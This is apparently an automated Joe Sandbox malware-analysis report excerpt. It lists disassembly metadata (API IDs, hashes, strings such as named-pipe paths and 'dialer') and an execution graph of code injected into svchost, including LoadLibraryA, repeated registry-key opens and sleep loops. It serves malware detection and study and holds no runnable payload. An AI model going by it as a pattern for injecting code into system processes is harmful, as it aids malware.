                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: a3876ba4f922288aea9d6b96c431ea7b649966905969bf4ba9e1eff6582024cf
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: F711397460178182FFA09B65F55D717A2A0BB99F81F44053ACB7907B64EF3EC0488700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 7ffa0dfc42b86114ccbad2c74472834742de292cb99e987e3827f1cf5a6acb06
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 85518C326116808AEF96CB15F64CB5A7395F3D5F98F5081329B3A47BA8EF36C881C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: bd11eaad6d4a6c48113b22b140734d13293aafa6e9482693a74bb70249ae0919
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 4931AD3221068096EB91DF15F94CB1A37A5F384F98F148126AF7B07B68CF3AC980C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 7725aefc686e0c70b42bb15f100827db4caf4e5721decb14bf5aef7075c7a084
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 6CF0317230468192FFA08B65F69D39B6760F784B88F848036CB6947E64DF2DC68CC700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 5acd88dc4c4579d9f9ab8bda5339a9b897349cc324ebf3f1b5c6224b8ea3de84
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: D7F05E30204BC092FE808B1BBA0912AA220ABC9FD0F4881329F7A07F68CE29C4818300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: f7e1def3eeac2e1f6742476391c635f94af88b283076f888d1c3f3be57755c57
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 2AF0DA75321B8491FFD54B64F9883662760ABC8B90F44202B963B47D74DF29C4C8C700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: d069feed6c0b0f3db1769c3cdc5b9bfc77c0779bce8bde6ed98114375a46bb52
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 7F029936219BC486EBA08B55F59435BB7A0F3C5B94F104126EBAE87B69DF79C484CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: be3327ef49c544beef6a98aa97293178206f5ba2597d4283de1411070fa82db6
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 06819132A1069089FF90AFA5AA987AF27A1B7C4B94F444137DF3A53EA5DF36C441C710
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: b53fb69a101e411410a0d71527e0ef8a35960a804745ee84d45a04280a219423
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 99619976519A84CAEAA09B15F55835B77A0F3C8B54F500126EBAE87FA8DF79C580CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: ee12453bd28e3afc577396a9ee6065a03c601330e7b9e9a09f2b34c0b2d34c21
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 5E118E32A54E0951FEE41169F75E3AF1171AB54374F784638EB7616FDF8E2A8C428200
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 36e19bdb03137a51d94cf8c5fc59f3a0f69a68c42d3294d8d089bc1d08861215
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: E8117032A54A8141FEEA1168F75E36B1041ABF5378F094637AB7607FF68F5ACC464200
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: b8e4028ec7f43a18d99d9638ff7ffc8236890d2320536a4e9f55bc358984ab51
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 61112E35704B8182FF949B69F50865BA6A0F785B84F440536DFA907BA4EE3EC545C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 4d9ae1b0c0e080de0e714dc8f709c2ff647a12b5c7e1cb0a884fe787546435ca
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: AB51AE3661A6008AEF98CF15FA48B5A37B5F340BA9F518134DB8687B8CDF36D841C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: e19394626fe34eb96dd8efde3864e342f7def1404c8e2bb869f0a0b4799960be
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: B2319C7621564086EB98DF11FA48B5A37B4F740B99F158034EF9A07B88CF3AD940C708
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: 1d538f3de1b63ca7a5203a6e535e1814286e94e46d15f76940d346a402b40b93
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: DA111C31614BD8D6EB959F6AB98825BB760F7CAF84F44402ADBAA03B64DF39C0518740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 0c14571bd64e89be7f58fcaf859723aa8e1df4df898fef2d28a9f666c5021b4d
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 63718C722107D186EEA49E29EA583ABA691F7C5F84F440037DF7943F99DE76C5C48700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: 1a7d86200d537741272481606de6ee0ae843ee6a338ff252bf49d7c2ca6d5db3
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: F05171326047C142EEA59A2AB65C3ABA651B7C5B80F554037DFBA03F99DE37C4C58B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: b3b9fd545fef02c50b494694c8c052df8d7fbc415664f389dc348d300d5629c4
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: C7419372714A8081EB60DF65F54839A67A0F3D8B84F444036EFAD87B58EF79C541CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: f9f1f0238fa9a7d8ef8b4d77b25a4db6fee6277e7c02bd8bb4827bb06db8a3ac
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 6B110B76608BC086DBA0CB56F54469AB7A4F7C9B94F544126EFAD83F69DF38C4508B00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: cab25d2c1113bc741c96d50252122c4bd7788635da7919d08d2ee0f85be9baa1
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 19111F32218B8082EFA18F15F64425A77A5F7C8F98F584226DFAD0BB64DF39C595CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 63339d3737b61d754a319d26a78aa6ff223a8b853c10df425ee19768a4565bfd
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: B6F05E35310BD091FE859B46F6486966321ABC8B90F885037AB7907F68CE3AC995C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2629301431.0000026F47BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F47BD0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f47bd0000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 9b5508709f5addfd39a5dc0f3005e0e7e63a2167a6cfd7400339a4a95d460fc2
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 1BE0923160854592EE899B51F7482EB26319B88740F695031F71906B5ECF3ACC8A9341
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 703f5d37dcab9542a39612fd4a97fb0f881afaf452dae0dd4d49ec64c4b88810
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 68E01B712106C0A1FF855B55FA4D6976322BBC8B80F985137E73D07B65CE3AC895C714
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 73d78c122a87bdf7dcca5161f7a8a029e466978b847249d385330bdd74768ffd
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 4B217136604BD081EE928F69B54829BB3A0FBC9B94F454122DFAD57F24EE79C5828700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.2631137231.0000026F48140000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026F48140000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_26f48140000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 727563492ac211b6f390472a903689ff5a487115f043112d9d0496eaa73908c2
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: DDE06D7161164086FB458F7AE84834A36E1FBC9F01F88C024CA2907760DF7EC499C740

                                                Execution Graph

                                                Execution Coverage:0.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:58
                                                Total number of Limit Nodes:4
                                                execution_graph 20734 29b91dd2908 20735 29b91dd2936 20734->20735 20736 29b91dd2a2b LoadLibraryA 20735->20736 20737 29b91dd2aa7 20735->20737 20736->20735 20738 29b9234b860 20743 29b9234b871 _invalid_parameter_noinfo 20738->20743 20739 29b9234b8c2 20744 29b9234b840 7 API calls _invalid_parameter_noinfo 20739->20744 20740 29b9234b8a6 HeapAlloc 20742 29b9234b8c0 20740->20742 20740->20743 20743->20739 20743->20740 20744->20742 20745 29b92341c28 20750 29b92341650 GetProcessHeap HeapAlloc 20745->20750 20747 29b92341c3e Sleep SleepEx 20748 29b92341c37 20747->20748 20748->20747 20749 29b923415c0 StrCmpIW StrCmpW 20748->20749 20749->20748 20794 29b92341274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20750->20794 20752 29b92341678 20795 29b92341274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20752->20795 20754 29b92341689 20796 29b92341274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20754->20796 20756 29b92341692 20797 29b92341274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20756->20797 20758 29b9234169b 20759 29b923416b6 RegOpenKeyExW 20758->20759 20760 29b923418ce 20759->20760 20761 29b923416e8 RegOpenKeyExW 20759->20761 20760->20748 20762 29b92341711 20761->20762 20763 29b92341727 RegOpenKeyExW 20761->20763 20798 29b923412c8 16 API calls 20762->20798 20765 29b92341762 RegOpenKeyExW 20763->20765 20766 29b9234174b 20763->20766 20769 29b9234179d RegOpenKeyExW 20765->20769 20770 29b92341786 20765->20770 20799 29b9234104c 6 API calls 20766->20799 20767 29b9234171d RegCloseKey 20767->20763 20771 29b923417c1 20769->20771 20772 29b923417d8 RegOpenKeyExW 20769->20772 20800 29b923412c8 16 API calls 20770->20800 20801 29b923412c8 16 API calls 20771->20801 20777 29b923417fc 20772->20777 20778 29b92341813 RegOpenKeyExW 20772->20778 20773 29b92341758 RegCloseKey 20773->20765 20775 29b92341793 RegCloseKey 20775->20769 20802 29b923412c8 16 API calls 20777->20802 20781 29b9234184e RegOpenKeyExW 20778->20781 20782 29b92341837 20778->20782 20779 29b923417ce RegCloseKey 20779->20772 20785 29b92341872 20781->20785 20786 29b92341889 RegOpenKeyExW 20781->20786 20803 29b9234104c 6 API calls 20782->20803 20783 29b92341809 RegCloseKey 20783->20778 20804 29b9234104c 6 API calls 20785->20804 20787 29b923418ad 20786->20787 20788 29b923418c4 RegCloseKey 20786->20788 20805 29b9234104c 6 API calls 20787->20805 20788->20760 20789 29b92341844 RegCloseKey 20789->20781 20791 29b9234187f RegCloseKey 20791->20786 20793 29b923418ba RegCloseKey 20793->20788 20794->20752 20795->20754 20796->20756 20797->20758 20798->20767 20799->20773 20800->20775 20801->20779 20802->20783 20803->20789 20804->20791 20805->20793

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: 7545b7b13d82f0a91c51c4df479a3f418c653166a1be343f01743be42ddf1b85
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: BC112170F3C60159FF639B21FB4EBA52290BB54774FA400659B5E872D4EF39C0448E50

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0000029B92341650: GetProcessHeap.KERNEL32 ref: 0000029B9234165B
                                                  • Part of subcall function 0000029B92341650: HeapAlloc.KERNEL32 ref: 0000029B9234166A
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923416DA
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B92341707
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341721
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B92341741
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B9234175C
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B9234177C
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341797
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923417B7
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B923417D2
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923417F2
                                                • Sleep.KERNEL32 ref: 0000029B92341C43
                                                • SleepEx.KERNELBASE ref: 0000029B92341C49
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B9234180D
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B9234182D
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341848
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B92341868
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B92341883
                                                  • Part of subcall function 0000029B92341650: RegOpenKeyExW.ADVAPI32 ref: 0000029B923418A3
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B923418BE
                                                  • Part of subcall function 0000029B92341650: RegCloseKey.ADVAPI32 ref: 0000029B923418C8
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
                                                • API String ID: 1534210851-0
                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction ID: 50e732c999ed38b02f108cbd88a1ebb4365d4235e9b54cbc5a8e9805dfd91454
                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                • Instruction Fuzzy Hash: DD311565F2CE0199FF529F36FB4936A13A4AB45BF8F0440A2DF8D876D5EF24C8508A50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 57 29b92343930-29b9234393b 58 29b9234393d-29b92343950 StrCmpNIW 57->58 59 29b92343955-29b9234395c 57->59 58->59 60 29b92343952 58->60 60->59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: dialer
                                                • API String ID: 0-3528709123
